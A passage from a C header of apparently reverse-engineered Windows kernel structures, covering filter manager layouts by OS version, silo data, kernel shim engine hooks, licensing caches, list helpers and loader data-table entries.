function */;\n    /* 0x0168 */ PVOID GenerateFileName /* function */;\n    /* 0x0170 */ PVOID NormalizeNameComponent /* function */;\n    /* 0x0178 */ PVOID NormalizeNameComponentEx /* function */;\n    /* 0x0180 */ PVOID NormalizeContextCleanup /* function */;\n    /* 0x0188 */ PVOID KtmNotification /* function */;\n    /* 0x0190 */ PVOID SectionNotification /* function */; //SINCE 8.1\n    /* 0x0198 */ struct _FLT_OPERATION_REGISTRATION* Operations;\n    /* 0x01a0 */ PVOID OldDriverUnload /* function */;\n    /* 0x01a8 */ FLT_MUTEX_LIST_HEAD ActiveOpens;\n    /* 0x01f8 */ FLT_MUTEX_LIST_HEAD ConnectionList;\n    /* 0x0248 */ FLT_MUTEX_LIST_HEAD PortList;\n    /* 0x0298 */ EX_PUSH_LOCK PortLock;\n} FLT_FILTER_V2, * PFLT_FILTER_V2; /* size: 0x02a0 */\n\n// Windows 10 version\ntypedef struct _FLT_FILTER_V3 {\n    /* 0x0000 */ FLT_OBJECT_V2 Base;\n    /* 0x0030 */ struct _FLTP_FRAME* Frame;\n    /* 0x0038 */ UNICODE_STRING Name;\n    /* 0x0048 */ UNICODE_STRING DefaultAltitude;\n    /* 0x0058 */ FLT_FILTER_FLAGS Flags;\n    /* 0x005c */ LONG Padding;\n    /* 0x0060 */ DRIVER_OBJECT* DriverObject;\n    /* 0x0068 */ FLT_RESOURCE_LIST_HEAD InstanceList;\n    /* 0x00e8 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;\n    /* 0x00f0 */ LIST_ENTRY VerifiedFiltersLink;\n    /* 0x0100 */ PVOID FilterUnload /* function */;\n    /* 0x0108 */ PVOID InstanceSetup /* function */;\n    /* 0x0110 */ PVOID InstanceQueryTeardown /* function */;\n    /* 0x0118 */ PVOID InstanceTeardownStart /* function */;\n    /* 0x0120 */ PVOID InstanceTeardownComplete /* function */;\n    /* 0x0128 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;\n    /* 0x0130 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];\n    /* 0x0168 */ PVOID PreVolumeMount /* function */;\n    /* 0x0170 */ PVOID PostVolumeMount /* function */;\n    /* 0x0178 */ PVOID GenerateFileName /* function */;\n    /* 0x0180 */ PVOID NormalizeNameComponent /* function */;\n    /* 0x0188 */ PVOID 
NormalizeNameComponentEx /* function */;\n    /* 0x0190 */ PVOID NormalizeContextCleanup /* function */;\n    /* 0x0198 */ PVOID KtmNotification /* function */;\n    /* 0x01a0 */ PVOID SectionNotification /* function */;\n    /* 0x01a8 */ struct _FLT_OPERATION_REGISTRATION* Operations;\n    /* 0x01b0 */ PVOID OldDriverUnload /* function */;\n    /* 0x01b8 */ FLT_MUTEX_LIST_HEAD ActiveOpens;\n    /* 0x0208 */ FLT_MUTEX_LIST_HEAD ConnectionList;\n    /* 0x0258 */ FLT_MUTEX_LIST_HEAD PortList;\n    /* 0x02a8 */ EX_PUSH_LOCK PortLock;\n} FLT_FILTER_V3, *PFLT_FILTER_V3; /* size: 0x02b0 */\n\n// Windows 10/11+ (22000)\ntypedef struct _FLT_FILTER_V4 {\n    /* 0x0000 */ FLT_OBJECT_V2 Base;\n    /* 0x0030 */ struct _FLTP_FRAME* Frame;\n    /* 0x0038 */ UNICODE_STRING Name;\n    /* 0x0048 */ UNICODE_STRING DefaultAltitude;\n    /* 0x0058 */ FLT_FILTER_FLAGS Flags;\n    /* 0x005c */ LONG Padding;\n    /* 0x0060 */ DRIVER_OBJECT* DriverObject;\n    /* 0x0068 */ FLT_RESOURCE_LIST_HEAD InstanceList;\n    /* 0x00e8 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;\n    /* 0x00f0 */ LIST_ENTRY VerifiedFiltersLink;\n    /* 0x0100 */ PVOID FilterUnload /* function */;\n    /* 0x0108 */ PVOID InstanceSetup /* function */;\n    /* 0x0110 */ PVOID InstanceQueryTeardown /* function */;\n    /* 0x0118 */ PVOID InstanceTeardownStart /* function */;\n    /* 0x0120 */ PVOID InstanceTeardownComplete /* function */;\n    /* 0x0128 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;\n    /* 0x0130 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];\n    /* 0x0168 */ PVOID PreVolumeMount /* function */;\n    /* 0x0170 */ PVOID PostVolumeMount /* function */;\n    /* 0x0178 */ PVOID GenerateFileName /* function */;\n    /* 0x0180 */ PVOID NormalizeNameComponent /* function */;\n    /* 0x0188 */ PVOID NormalizeNameComponentEx /* function */;\n    /* 0x0190 */ PVOID NormalizeContextCleanup /* function */;\n    /* 0x0198 */ PVOID KtmNotification /* function */;\n    /* 0x01a0 
*/ PVOID SectionNotification /* function */;\n    /* 0x01a8 */ struct _FLT_OPERATION_REGISTRATION* Operations;\n    /* 0x01b0 */ PVOID OldDriverUnload /* function */;\n    /* 0x01b8 */ FLT_MUTEX_LIST_HEAD ActiveOpens;\n    /* 0x0208 */ FLT_MUTEX_LIST_HEAD ConnectionList;\n    /* 0x0258 */ FLT_MUTEX_LIST_HEAD PortList;\n    /* 0x02a8 */ EX_PUSH_LOCK_AUTO_EXPAND PortLock;\n} FLT_FILTER_V4, * PFLT_FILTER_V4; /* size: 0x02b8 */\n\n// Windows 11+ (27XXX)\ntypedef struct _FLT_FILTER_V5 {\n    /* 0x0000 */ FLT_OBJECT_V3 Base;\n    /* 0x0038 */ struct _FLTP_FRAME* Frame;\n    /* 0x0040 */ UNICODE_STRING Name;\n    /* 0x0050 */ UNICODE_STRING DefaultAltitude;\n    /* 0x0060 */ FLT_FILTER_FLAGS Flags;\n    /* 0x0064 */ LONG Padding;\n    /* 0x0068 */ DRIVER_OBJECT* DriverObject;\n    /* 0x0070 */ FLT_RESOURCE_LIST_HEAD InstanceList;\n    /* 0x00f0 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;\n    /* 0x00f8 */ LIST_ENTRY VerifiedFiltersLink;\n    /* 0x0108 */ PVOID FilterUnload /* function */;\n    /* 0x0110 */ PVOID InstanceSetup /* function */;\n    /* 0x0118 */ PVOID InstanceQueryTeardown /* function */;\n    /* 0x0120 */ PVOID InstanceTeardownStart /* function */;\n    /* 0x0128 */ PVOID InstanceTeardownComplete /* function */;\n    /* 0x0130 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;\n    /* 0x0138 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];\n    /* 0x0170 */ PVOID PreVolumeMount /* function */;\n    /* 0x0178 */ PVOID PostVolumeMount /* function */;\n    /* 0x0180 */ PVOID GenerateFileName /* function */;\n    /* 0x0188 */ PVOID NormalizeNameComponent /* function */;\n    /* 0x0190 */ PVOID NormalizeNameComponentEx /* function */;\n    /* 0x0198 */ PVOID NormalizeContextCleanup /* function */;\n    /* 0x01a0 */ PVOID KtmNotification /* function */;\n    /* 0x01a8 */ PVOID SectionNotification /* function */;\n    /* 0x01b0 */ struct _FLT_OPERATION_REGISTRATION* Operations;\n    /* 0x01b8 */ PVOID OldDriverUnload /* function 
*/;\n    /* 0x01c0 */ FLT_MUTEX_LIST_HEAD ActiveOpens;\n    /* 0x0210 */ FLT_MUTEX_LIST_HEAD ConnectionList;\n    /* 0x0260 */ FLT_MUTEX_LIST_HEAD PortList;\n    /* 0x02b0 */ EX_PUSH_LOCK_AUTO_EXPAND PortLock;\n} FLT_FILTER_V5, * PFLT_FILTER_V5; /* size: 0x02c0 */\n\ntypedef FLT_FILTER_V5 FLT_FILTER_COMPATIBLE;\ntypedef PFLT_FILTER_V5 PFLT_FILTER_COMPATIBLE;\n\n/*\n** FLT MANAGER END\n*/\n\n/*\n** SILO START\n*/\n\ntypedef struct _SYSTEM_ROOT_SILO_INFORMATION {\n    ULONG NumberOfSilos;\n    ULONG SiloIdList[1];\n} SYSTEM_ROOT_SILO_INFORMATION, *PSYSTEM_ROOT_SILO_INFORMATION;\n\ntypedef struct _SILO_USER_SHARED_DATA {\n    ULONG ServiceSessionId;\n    ULONG ActiveConsoleId;\n    LONGLONG ConsoleSessionForegroundProcessId;\n    NT_PRODUCT_TYPE NtProductType;\n    ULONG SuiteMask;\n    ULONG SharedUserSessionId; // since RS2\n    BOOLEAN IsMultiSessionSku;\n    WCHAR NtSystemRoot[260];\n    USHORT UserModeGlobalLogger[16];\n    ULONG TimeZoneId; // since 21H2\n    LONG TimeZoneBiasStamp;\n    KSYSTEM_TIME TimeZoneBias;\n    LARGE_INTEGER TimeZoneBiasEffectiveStart;\n    LARGE_INTEGER TimeZoneBiasEffectiveEnd;\n} SILO_USER_SHARED_DATA, *PSILO_USER_SHARED_DATA;\n\ntypedef struct _OBP_SYSTEM_DOS_DEVICE_STATE {\n    ULONG GlobalDeviceMap;\n    ULONG LocalDeviceCount[26];\n} OBP_SYSTEM_DOS_DEVICE_STATE, *POBP_SYSTEM_DOS_DEVICE_STATE;\n\ntypedef struct _OBP_SILODRIVERSTATE {\n    PDEVICE_MAP SystemDeviceMap;\n    OBP_SYSTEM_DOS_DEVICE_STATE SystemDosDeviceState;\n    EX_PUSH_LOCK DeviceMapLock;\n    OBJECT_NAMESPACE_LOOKUPTABLE PrivateNamespaceLookupTable;\n} OBP_SILODRIVERSTATE, *POBP_SILODRIVERSTATE;\n\ntypedef struct _OBP_SILODRIVERSTATE_V2 {\n    EX_FAST_REF SystemDeviceMap;\n    OBP_SYSTEM_DOS_DEVICE_STATE SystemDosDeviceState;\n    EX_PUSH_LOCK DeviceMapLock;\n    OBJECT_NAMESPACE_LOOKUPTABLE PrivateNamespaceLookupTable;\n} OBP_SILODRIVERSTATE_V2, * POBP_SILODRIVERSTATE_V2; /* size: 0x02e0 */\n\n//incomplete, values not important, change between versions.\ntypedef 
struct _ESERVERSILO_GLOBALS {\n    OBP_SILODRIVERSTATE ObSiloState;\n    //incomplete\n} ESERVERSILO_GLOBALS, *PESERVERSILO_GLOBALS;\n\n/*\n** SILO END\n*/\n\n/*\n** KSE START\n*/\n\ntypedef enum _KSE_DISABLE_FLAGS {\n    DisableNone = 0,\n    DisableDriverShims = 1,\n    DisableDeviceShims = 2,\n    MaxDisableFlags\n} KSE_DISABLE_FLAGS;\n\ntypedef enum _KSE_STATE {\n    KseNotReady = 0,\n    KseInProgress = 1,\n    KseReady = 2\n} KSE_STATE;\n\n#define KseFlagsNone                0x0000\n#define KseFlagsGroupPolicyOk       0x0002\n#define KseFlagsVerifierEnabled     0x0040\n#define KseFlagsNoDb                0x0080   \n#define KseFlagsInitSafeMode        0x0100\n#define KseFlagsDrvShimActive       0x0800\n#define KseFlagsDevShimsActive      0x1000\n\n#if _MSC_VER >= 1200\n#pragma warning(push)\n#pragma warning(disable:4324) // structure was padded due to __declspec(align())\n#endif\ntypedef struct DECLSPEC_ALIGN(MEMORY_ALLOCATION_ALIGNMENT)_KSE_ENGINE {\n    KSE_DISABLE_FLAGS DisableFlags;\n    KSE_STATE State;\n    ULONG Flags; //KseFlags*\n    LIST_ENTRY ProvidersListHead;\n    LIST_ENTRY ShimmedDriversListHead;\n    PVOID KseGetIoCallbacksRoutine;\n    PVOID KseSetCompletionHookRoutine;\n    PVOID DeviceInfoCache;\n    PVOID HardwareIdCache;\n    PVOID ShimmedDriverHint;\n} KSE_ENGINE, * PKSE_ENGINE;\n\n#if _MSC_VER >= 1200\n#pragma warning(pop)\n#endif\n\ntypedef struct _KSE_SHIM {\n    ULONG Size;\n    GUID* Guid;\n    PWCHAR Name;\n    PVOID KseCallbackRoutines;\n    PVOID RemoveNotificationRoutine;\n    PVOID ApplyNotificationRoutine;\n    PVOID HookCollectionsArray;\n} KSE_SHIM, * PKSE_SHIM;\n\ntypedef enum _KSE_HOOK_COLLECTION_TYPE {\n    HookNtOsImport = 0,\n    HookHalImport = 1,\n    HookNamedModuleImports = 2,\n    HookCallbacks = 3,\n    HookLastCollection = 4\n} KSE_HOOK_COLLECTION_TYPE;\n\ntypedef struct _KSE_HOOK_COLLECTION {\n    KSE_HOOK_COLLECTION_TYPE Type;\n    PWCHAR TargetDriverName;\n    PVOID HookArray;\n} KSE_HOOK_COLLECTION, * 
PKSE_HOOK_COLLECTION;\n\ntypedef enum _KSE_HOOK_TYPE {\n    HookFunction = 0,\n    HookIrpCallback = 1,\n    HookLast = 2\n} KSE_HOOK_TYPE, * PKSE_HOOK_TYPE;\n\ntypedef struct _KSE_HOOK {\n    KSE_HOOK_TYPE Type;\n    union {\n        PCHAR FunctionName;\n        ULONG CallbackId;\n    } DUMMYUNION;\n    PVOID HookFunction;\n    PVOID OriginalFunction;\n} KSE_HOOK, * PKSE_HOOK;\n\ntypedef struct _KSE_PROVIDER {\n    LIST_ENTRY ProviderList;\n    PKSE_SHIM Shim;\n} KSE_PROVIDER, * PKSE_PROVIDER;\n\ntypedef struct _KSE_SHIMMED_DRIVER {\n    LIST_ENTRY ListEntry;\n    PVOID DriverBaseAddress;\n    ULONG RefCount;\n    GUID* ShimGuid;\n    //incomplete\n} KSE_SHIMMED_DRIVER, * PKSE_SHIMMED_DRIVER;\n\n/*\n** KSE END\n*/\n\n/*\n** SOFTWARE LICENSING START\n*/\n#pragma pack(push, 1)\ntypedef struct _SL_CACHE_VALUE_DESCRIPTOR {\n    USHORT Size;\n    USHORT NameLength;\n    USHORT Type;\n    USHORT DataLength;\n    ULONG Attributes;\n    ULONG Reserved;\n    WCHAR Name[ANYSIZE_ARRAY];\n} SL_CACHE_VALUE_DESCRIPTOR, *PSL_CACHE_VALUE_DESCRIPTOR;\ntypedef SL_CACHE_VALUE_DESCRIPTOR SL_KMEM_CACHE_VALUE_DESCRIPTOR;\n#pragma pack(pop)\n\ntypedef struct _SL_CACHE {\n    ULONG TotalSize;\n    ULONG SizeOfData;\n    ULONG SignatureSize;\n    ULONG Flags;\n    ULONG Version;\n    SL_KMEM_CACHE_VALUE_DESCRIPTOR Descriptors[ANYSIZE_ARRAY];\n} SL_CACHE, *PSL_CACHE;\ntypedef SL_CACHE SL_KMEM_CACHE;\n\ntypedef struct _SL_APPX_CACHE_VALUE_DESCRIPTOR {\n    UCHAR HashedName[32];\n    ULONGLONG Expiration;\n    ULONG DataSize;\n    WCHAR Name[ANYSIZE_ARRAY];\n} SL_APPX_CACHE_VALUE_DESCRIPTOR, *PSL_APPX_CACHE_VALUE_DESCRIPTOR;\n\ntypedef struct _SL_APPX_CACHE {\n    ULONG Version;\n    ULONG Flags;\n    ULONG DataSize;\n    ULONGLONG DataCheckSum;\n    SL_APPX_CACHE_VALUE_DESCRIPTOR Descriptors[ANYSIZE_ARRAY];\n} SL_APPX_CACHE, *PSL_APPX_CACHE;\n\n\n/*\n** SOFTWARE LICENSING END\n*/\n\n/*\n** List Entry macro START (wdm.h)\n*/\n\n#if defined (NTOS_ENABLE_LIST_ENTRY_MACRO)\n\n#define 
InitializeListHead32(ListHead) (\\\n    (ListHead)->Flink = (ListHead)->Blink = PtrToUlong((ListHead)))\n\nFORCEINLINE\nVOID\nInitializeListHead(\n    _Out_ PLIST_ENTRY ListHead\n)\n{\n    ListHead->Flink = ListHead->Blink = ListHead;\n    return;\n}\n\n_Must_inspect_result_\nBOOLEAN\nCFORCEINLINE\nIsListEmpty(\n    _In_ const LIST_ENTRY* ListHead\n)\n{\n    return (BOOLEAN)(ListHead->Flink == ListHead);\n}\n\nFORCEINLINE\nBOOLEAN\nRemoveEntryList(\n    _In_ PLIST_ENTRY Entry\n)\n{\n    PLIST_ENTRY Blink;\n    PLIST_ENTRY Flink;\n\n    Flink = Entry->Flink;\n    Blink = Entry->Blink;\n    Blink->Flink = Flink;\n    Flink->Blink = Blink;\n    return (BOOLEAN)(Flink == Blink);\n}\n\nFORCEINLINE\nPLIST_ENTRY\nRemoveHeadList(\n    _Inout_ PLIST_ENTRY ListHead\n)\n{\n    PLIST_ENTRY Flink;\n    PLIST_ENTRY Entry;\n\n    Entry = ListHead->Flink;\n    Flink = Entry->Flink;\n    ListHead->Flink = Flink;\n    Flink->Blink = ListHead;\n    return Entry;\n}\n\nFORCEINLINE\nPLIST_ENTRY\nRemoveTailList(\n    _Inout_ PLIST_ENTRY ListHead\n)\n{\n    PLIST_ENTRY Blink;\n    PLIST_ENTRY Entry;\n\n    Entry = ListHead->Blink;\n    Blink = Entry->Blink;\n    ListHead->Blink = Blink;\n    Blink->Flink = ListHead;\n    return Entry;\n}\n\nFORCEINLINE\nVOID\nInsertTailList(\n    _Inout_ PLIST_ENTRY ListHead,\n    _Inout_ __drv_aliasesMem PLIST_ENTRY Entry\n)\n{\n    PLIST_ENTRY Blink;\n\n    Blink = ListHead->Blink;\n    Entry->Flink = ListHead;\n    Entry->Blink = Blink;\n    Blink->Flink = Entry;\n    ListHead->Blink = Entry;\n    return;\n}\n\nFORCEINLINE\nVOID\nInsertHeadList(\n    _Inout_ PLIST_ENTRY ListHead,\n    _Inout_ __drv_aliasesMem PLIST_ENTRY Entry\n)\n{\n    PLIST_ENTRY Flink;\n\n    Flink = ListHead->Flink;\n    Entry->Flink = Flink;\n    Entry->Blink = ListHead;\n    Flink->Blink = Entry;\n    ListHead->Flink = Entry;\n    return;\n}\n\nFORCEINLINE\nVOID\nAppendTailList(\n    _Inout_ PLIST_ENTRY ListHead,\n    _Inout_ PLIST_ENTRY ListToAppend\n)\n{\n    PLIST_ENTRY 
ListEnd = ListHead->Blink;\n\n    ListHead->Blink->Flink = ListToAppend;\n    ListHead->Blink = ListToAppend->Blink;\n    ListToAppend->Blink->Flink = ListHead;\n    ListToAppend->Blink = ListEnd;\n    return;\n}\n\nFORCEINLINE\nPSINGLE_LIST_ENTRY\nPopEntryList(\n    _Inout_ PSINGLE_LIST_ENTRY ListHead\n)\n{\n    PSINGLE_LIST_ENTRY FirstEntry;\n\n    FirstEntry = ListHead->Next;\n    if (FirstEntry != NULL) {\n        ListHead->Next = FirstEntry->Next;\n    }\n\n    return FirstEntry;\n}\n\nFORCEINLINE\nVOID\nPushEntryList(\n    _Inout_ PSINGLE_LIST_ENTRY ListHead,\n    _Inout_ __drv_aliasesMem PSINGLE_LIST_ENTRY Entry\n)\n{\n    Entry->Next = ListHead->Next;\n    ListHead->Next = Entry;\n    return;\n}\n\n#define ASSERT_LIST_ENTRY_VALID(ListEntry) {                    \\\n    if (ListEntry == NULL)                                      \\\n        return;                                                 \\\n    if (ListEntry->Flink == NULL || ListEntry->Blink == NULL)   \\\n        return;                                                 \\\n}\n\n#define ASSERT_LIST_ENTRY_VALID_ERROR_X(ListEntry, X) {         \\\n    if (ListEntry == NULL)                                      \\\n        return X;                                               \\\n    if (ListEntry->Flink == NULL || ListEntry->Blink == NULL)   \\\n        return X;                                               \\\n}\n\n#define ASSERT_LIST_ENTRY_VALID_BOOLEAN(ListEntry) ASSERT_LIST_ENTRY_VALID_ERROR_X(ListEntry, FALSE)\n\n#endif /* NTOS_ENABLE_LIST_ENTRY_MACRO */\n\n/*\n** List Entry macro END\n*/\n\n/*\n**  LDR START\n*/\n\n#define LDR_DLL_NOTIFICATION_REASON_LOADED   1\n#define LDR_DLL_NOTIFICATION_REASON_UNLOADED 2\n\ntypedef enum _LDR_DLL_LOAD_REASON {\n    LoadReasonStaticDependency = 0,\n    LoadReasonStaticForwarderDependency,\n    LoadReasonDynamicForwarderDependency,\n    LoadReasonDelayloadDependency,\n    LoadReasonDynamicLoad,\n    LoadReasonAsImageLoad,\n    LoadReasonAsDataLoad,\n    
LoadReasonEnclavePrimary,\n    LoadReasonEnclaveDependency,\n    LoadReasonPatchImage,\n    LoadReasonUnknown = -1\n} LDR_DLL_LOAD_REASON, * PLDR_DLL_LOAD_REASON;\n\n//\n// Dll Characteristics for LdrLoadDll\n//\n#define LDR_IGNORE_CODE_AUTHZ_LEVEL                 0x00001000\n\n//\n// LdrAddRef Flags\n//\n#define LDR_ADDREF_DLL_PIN                          0x00000001\n\n//\n// LdrLockLoaderLock Flags\n//\n#define LDR_LOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS   0x00000001\n#define LDR_LOCK_LOADER_LOCK_FLAG_TRY_ONLY          0x00000002\n\n//\n// LdrUnlockLoaderLock Flags\n//\n#define LDR_UNLOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001\n\n//\n// LdrGetDllHandleEx Flags\n//\n#define LDR_GET_DLL_HANDLE_EX_UNCHANGED_REFCOUNT    0x00000001\n#define LDR_GET_DLL_HANDLE_EX_PIN                   0x00000002\n\n//\n// LdrGetProcedureAddressEx Flags\n//\n#define LDR_GET_PROCEDURE_ADDRESS_DONT_RECORD_FORWARDER 0x00000001\n\n#define RESOURCE_TYPE_LEVEL     0\n#define RESOURCE_NAME_LEVEL     1\n#define RESOURCE_LANGUAGE_LEVEL 2\n#define RESOURCE_DATA_LEVEL     3\n\ntypedef struct _LDR_RESOURCE_INFO {\n    ULONG_PTR Type;\n    ULONG_PTR Name;\n    ULONG Lang;\n} LDR_RESOURCE_INFO, * PLDR_RESOURCE_INFO;\n\ntypedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE {\n    LIST_ENTRY InLoadOrderLinks;\n    LIST_ENTRY InMemoryOrderLinks;\n    union\n    {\n        LIST_ENTRY InInitializationOrderLinks;\n        LIST_ENTRY InProgressLinks;\n    } DUMMYUNION0;\n    PVOID DllBase;\n    PVOID EntryPoint;\n    ULONG SizeOfImage;\n    UNICODE_STRING FullDllName;\n    UNICODE_STRING BaseDllName;\n    union\n    {\n        ULONG Flags;\n        struct\n        {\n            ULONG PackagedBinary : 1; // Size=4 Offset=104 BitOffset=0 BitCount=1\n            ULONG MarkedForRemoval : 1; // Size=4 Offset=104 BitOffset=1 BitCount=1\n            ULONG ImageDll : 1; // Size=4 Offset=104 BitOffset=2 BitCount=1\n            ULONG LoadNotificationsSent : 1; // Size=4 Offset=104 BitOffset=3 BitCount=1\n            
ULONG TelemetryEntryProcessed : 1; // Size=4 Offset=104 BitOffset=4 BitCount=1\n            ULONG ProcessStaticImport : 1; // Size=4 Offset=104 BitOffset=5 BitCount=1\n            ULONG InLegacyLists : 1; // Size=4 Offset=104 BitOffset=6 BitCount=1\n            ULONG InIndexes : 1; // Size=4 Offset=104 BitOffset=7 BitCount=1\n            ULONG ShimDll : 1; // Size=4 Offset=104 BitOffset=8 BitCount=1\n            ULONG InExceptionTable : 1; // Size=4 Offset=104 BitOffset=9 BitCount=1\n            ULONG ReservedFlags1 : 2; // Size=4 Offset=104 BitOffset=10 BitCount=2\n            ULONG LoadInProgress : 1; // Size=4 Offset=104 BitOffset=12 BitCount=1\n            ULONG LoadConfigProcessed : 1; // Size=4 Offset=104 BitOffset=13 BitCount=1\n            ULONG EntryProcessed : 1; // Size=4 Offset=104 BitOffset=14 BitCount=1\n            ULONG ProtectDelayLoad : 1; // Size=4 Offset=104 BitOffset=15 BitCount=1\n            ULONG ReservedFlags3 : 2; // Size=4 Offset=104 BitOffset=16 BitCount=2\n            ULONG DontCallForThreads : 1; // Size=4 Offset=104 BitOffset=18 BitCount=1\n            ULONG ProcessAttachCalled : 1; // Size=4 Offset=104 BitOffset=19 BitCount=1\n            ULONG ProcessAttachFailed : 1; // Size=4 Offset=104 BitOffset=20 BitCount=1\n            ULONG CorDeferredValidate : 1; // Size=4 Offset=104 BitOffset=21 BitCount=1\n            ULONG CorImage : 1; // Size=4 Offset=104 BitOffset=22 BitCount=1\n            ULONG DontRelocate : 1; // Size=4 Offset=104 BitOffset=23 BitCount=1\n            ULONG CorILOnly : 1; // Size=4 Offset=104 BitOffset=24 BitCount=1\n            ULONG ChpeImage : 1; // Size=4 Offset=104 BitOffset=25 BitCount=1\n            ULONG ReservedFlags5 : 2; // Size=4 Offset=104 BitOffset=26 BitCount=2\n            ULONG Redirected : 1; // Size=4 Offset=104 BitOffset=28 BitCount=1\n            ULONG ReservedFlags6 : 2; // Size=4 Offset=104 BitOffset=29 BitCount=2\n            ULONG CompatDatabaseProcessed : 1; // Size=4 Offset=104 
BitOffset=31 BitCount=1\n        };\n    } ENTRYFLAGSUNION;\n    WORD ObsoleteLoadCount;\n    WORD TlsIndex;\n    union\n    {\n        LIST_ENTRY HashLinks;\n        struct\n        {\n            PVOID SectionPointer;\n            ULONG CheckSum;\n        };\n    } DUMMYUNION1;\n    union\n    {\n        ULONG TimeDateStamp;\n        PVOID LoadedImports;\n    } DUMMYUNION2;\n    //fields below removed for compatibility, if you need them use LDR_DATA_TABLE_ENTRY_FULL\n} LDR_DATA_TABLE_ENTRY_COMPATIBLE, * PLDR_DATA_TABLE_ENTRY_COMPATIBLE;\ntypedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY;\ntypedef LDR_DATA_TABLE_ENTRY_COMPATIBLE* PLDR_DATA_TABLE_ENTRY;\ntypedef LDR_DATA_TABLE_ENTRY* PCLDR_DATA_TABLE_ENTRY;\n\ntypedef BOOLEAN(NTAPI* PLDR_INIT_ROUTINE)(\n    _In_ PVOID DllHandle,\n    _In_ ULONG Reason,\n    _In_opt_ PVOID Context\n    );\n\ntypedef struct _LDR_SERVICE_TAG_RECORD\n{\n    struct _LDR_SERVICE_TAG_RECORD* Next;\n    ULONG ServiceTag;\n} LDR_SERVICE_TAG_RECORD, * PLDR_SERVICE_TAG_RECORD;\n\ntypedef struct _LDRP_CSLIST\n{\n    PSINGLE_LIST_ENTRY Tail;\n} LDRP_CSLIST, * PLDRP_CSLIST;\n\ntypedef enum _LDR_DDAG_STATE\n{\n    LdrModulesMerged = -5,\n    LdrModulesInitError = -4,\n    LdrModulesSnapError = -3,\n    LdrModulesUnloaded = -2,\n    LdrModulesUnloading = -1,\n    LdrModulesPlaceHolder = 0,\n    LdrModulesMapping = 1,\n    LdrModulesMapped = 2,\n    LdrModulesWaitingForDependencies = 3,\n    LdrModulesSnapping = 4,\n    LdrModulesSnapped = 5,\n    LdrModulesCondensed = 6,\n    LdrModulesReadyToInit = 7,\n    LdrModulesInitializing = 8,\n    LdrModulesReadyToRun = 9\n} LDR_DDAG_STATE;\n\ntypedef struct _LDR_DDAG_NODE\n{\n    LIST_ENTRY Modules;\n    PLDR_SERVICE_TAG_RECORD ServiceTagList;\n    ULONG LoadCount;\n    ULONG LoadWhileUnloadingCount;\n    ULONG LowestLink;\n    union\n    {\n        LDRP_CSLIST Dependencies;\n        SINGLE_LIST_ENTRY RemovalLink;\n    };\n    LDRP_CSLIST IncomingDependencies;\n    LDR_DDAG_STATE State;\n    
SINGLE_LIST_ENTRY CondenseLink;\n    ULONG PreorderNumber;\n} LDR_DDAG_NODE, * PLDR_DDAG_NODE;\n\ntypedef enum _LDR_HOT_PATCH_STATE\n{\n    LdrHotPatchBaseImage = 0,\n    LdrHotPatchNotApplied = 1,\n    LdrHotPatchAppliedReverse = 2,\n    LdrHotPatchAppliedForward = 3,\n    LdrHotPatchFailedToPatch = 4,\n    LdrHotPatchStateMax = 5,\n} LDR_HOT_PATCH_STATE, * PLDR_HOT_PATCH_STATE;\n\n//\n// Full declaration of LDR_DATA_TABLE_ENTRY\n//\ntypedef struct _LDR_DATA_TABLE_ENTRY_FULL\n{\n    LIST_ENTRY InLoadOrderLinks;\n    LIST_ENTRY InMemoryOrderLinks;\n    union\n    {\n        LIST_ENTRY InInitializationOrderLinks;\n        LIST_ENTRY InProgressLinks;\n    };\n    PVOID DllBase;\n    PLDR_INIT_ROUTINE EntryPoint;\n    ULONG SizeOfImage;\n    UNICODE_STRING FullDllName;\n    UNICODE_STRING BaseDllName;\n    union\n    {\n        UCHAR FlagGroup[4];\n        ULONG Flags;\n        struct\n        {\n            ULONG PackagedBinary : 1;\n            ULONG MarkedForRemoval : 1;\n            ULONG ImageDll : 1;\n            ULONG LoadNotificationsSent : 1;\n            ULONG TelemetryEntryProcessed : 1;\n            ULONG ProcessStaticImport : 1;\n            ULONG InLegacyLists : 1;\n            ULONG InIndexes : 1;\n            ULONG ShimDll : 1;\n            ULONG InExceptionTable : 1;\n            ULONG ReservedFlags1 : 2;\n            ULONG LoadInProgress : 1;\n            ULONG LoadConfigProcessed : 1;\n            ULONG EntryProcessed : 1;\n            ULONG ProtectDelayLoad : 1;\n            ULONG ReservedFlags3 : 2;\n            ULONG DontCallForThreads : 1;\n            ULONG ProcessAttachCalled : 1;\n            ULONG ProcessAttachFailed : 1;\n            ULONG CorDeferredValidate : 1;\n            ULONG CorImage : 1;\n            ULONG DontRelocate : 1;\n            ULONG CorILOnly : 1;\n            ULONG ChpeImage : 1;\n            ULONG ChpeEmulatorImage : 1;\n            ULONG ReservedFlags5 : 1;\n            ULONG Redirected : 1;\n            ULONG 
ReservedFlags6 : 2;\n            ULONG CompatDatabaseProcessed : 1;\n        };\n    };\n    USHORT ObsoleteLoadCount;\n    USHORT TlsIndex;\n    LIST_ENTRY HashLinks;\n    ULONG TimeDateStamp;\n    PACTIVATION_CONTEXT EntryPointActivationContext;\n    PVOID Lock;\n    PLDR_DDAG_NODE DdagNode;\n    LIST_ENTRY NodeModuleLink;\n    PVOID LoadContext;\n    PVOID ParentDllBase;\n    PVOID SwitchBackContext;\n    RTL_BALANCED_NODE BaseAddressIndexNode;\n    RTL_BALANCED_NODE MappingInfoIndexNode;\n    ULONG_PTR OriginalBase;\n    LARGE_INTEGER LoadTime;\n    ULONG BaseNameHashValue;\n    LDR_DLL_LOAD_REASON LoadReason;\n    ULONG ImplicitPathOptions;\n    ULONG ReferenceCount;\n    ULONG DependentLoadFlags;\n    UCHAR SigningLevel;\n    ULONG CheckSum; \n    PVOID ActivePatchImageBase;\n    LDR_HOT_PATCH_STATE HotPatchState;\n} LDR_DATA_TABLE_ENTRY_FULL, * PLDR_DATA_TABLE_ENTRY_FULL;\n\ntypedef struct 